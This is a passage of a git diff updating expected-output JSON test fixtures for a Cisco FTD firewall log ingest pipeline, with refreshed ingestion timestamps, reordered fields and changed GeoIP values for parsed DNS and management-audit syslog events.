@@ -2929,7 +2809,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913058Z", + "ingested": "2021-12-14T14:39:57.642447079Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46093, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 131, NAPPolicy: Balanced Security and Connectivity, DNSRecordType: a domain name pointer, DNS_TTL: 59", "code": "430003", "kind": "event", @@ -2991,37 +2871,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -3030,15 +2904,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -3077,7 +2951,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:35:02.913064400Z", + "ingested": "2021-12-14T14:39:57.642447489Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index 4253c442cad..50bd113558a 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json 
@@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2019-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" @@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.406347800Z", + "ingested": "2021-12-14T14:40:02.331746143Z", "original": "Jan 1 2019 01:00:27 beats asa[1234]: %FTD-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:35:07.406356100Z", + "ingested": "2021-12-14T14:40:02.331749335Z", "original": "Jan 1 2019 01:00:30 beats asa[1234]: %FTD-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json index 01f60058c6a..dc7c6c06f01 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-firepower-management.log-expected.json 
@@ -1,1257 +1,1254 @@ { "expected": [ { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:56:30.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581578300Z", + "ingested": "2021-12-14T14:40:02.507004545Z", "original": "\u003c14\u003eAug 14 2019 13:56:30 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581586900Z", + "ingested": "2021-12-14T14:40:02.507007023Z", "original": "\u003c14\u003eAug 14 2019 13:57:19 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=Banner, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ChangeReconciliation.cgi" - }, - "log": { - "level": "debug" - }, 
- "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ChangeReconciliation.cgi" + }, "@timestamp": "2019-08-14T13:57:26.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581591600Z", + "ingested": "2021-12-14T14:40:02.507007517Z", "original": "\u003c14\u003eAug 14 2019 13:57:26 ChangeReconciliation.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/ChangeReconciliation.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T13:57:34.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581595700Z", + "ingested": "2021-12-14T14:40:02.507007909Z", "original": "\u003c14\u003eAug 14 2019 13:57:34 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=IntrusionPolicyPrefs, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "lights_out_mgmt.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": 
"firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "lights_out_mgmt.cgi" + }, "@timestamp": "2019-08-14T13:57:43.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581600100Z", + "ingested": "2021-12-14T14:40:02.507008300Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581604700Z", + "ingested": "2021-12-14T14:40:02.507008691Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { 
+ "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581609600Z", + "ingested": "2021-12-14T14:40:02.507009094Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581615400Z", + "ingested": "2021-12-14T14:40:02.507009485Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:41.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581621Z", + "ingested": "2021-12-14T14:40:02.507009876Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", 
"code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:58:47.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581626600Z", + "ingested": "2021-12-14T14:40:02.507010266Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:52.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581632200Z", + "ingested": "2021-12-14T14:40:02.507010651Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { 
"type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:54.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581638200Z", + "ingested": "2021-12-14T14:40:02.507011204Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:10.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581643900Z", + "ingested": "2021-12-14T14:40:02.507011590Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:15.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { 
"severity": 7, - "ingested": "2021-12-09T13:35:07.581649600Z", + "ingested": "2021-12-14T14:40:02.507011982Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581655100Z", + "ingested": "2021-12-14T14:40:02.507012378Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581660800Z", + "ingested": "2021-12-14T14:40:02.507012770Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: 
Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581666600Z", + "ingested": "2021-12-14T14:40:02.507013295Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581675100Z", + "ingested": "2021-12-14T14:40:02.507013709Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": 
"firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581679900Z", + "ingested": "2021-12-14T14:40:02.507014099Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:13.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581685800Z", + "ingested": "2021-12-14T14:40:02.507014472Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, 
"event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581690800Z", + "ingested": "2021-12-14T14:40:02.507014866Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581694800Z", + "ingested": "2021-12-14T14:40:02.507015255Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581699100Z", + "ingested": "2021-12-14T14:40:02.507018267Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration 
Generation\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:01:35.000Z", - "ecs": { - "version": "1.12.0" - }, - "host": { - "name": "siem-management" - }, - "event": { - "severity": 7, - "ingested": "2021-12-09T13:35:07.581702900Z", - "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", - "code": "" - }, - "cisco": { - "ftd": {} - } - }, - { "process": { "name": "ActionQueueScrape.pl" }, + "@timestamp": "2019-08-14T14:01:35.000Z", + "ecs": { + "version": "1.12.0" + }, "log": { "level": "debug" }, + "host": { + "name": "siem-management" + }, "syslog": { "facility": { "code": 14 } }, + "event": { + "severity": 7, + "ingested": "2021-12-14T14:40:02.507018777Z", + "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", + "code": "" + }, + "cisco": { + "ftd": {} + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:36.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581707700Z", + "ingested": "2021-12-14T14:40:02.507019165Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for 
siem-ftd\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:01:55.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581713400Z", + "ingested": "2021-12-14T14:40:02.507019552Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:56.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581719Z", + "ingested": "2021-12-14T14:40:02.507019960Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": 
"Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:57.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581724600Z", + "ingested": "2021-12-14T14:40:02.507020343Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:03.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581730100Z", + "ingested": "2021-12-14T14:40:02.507020752Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e 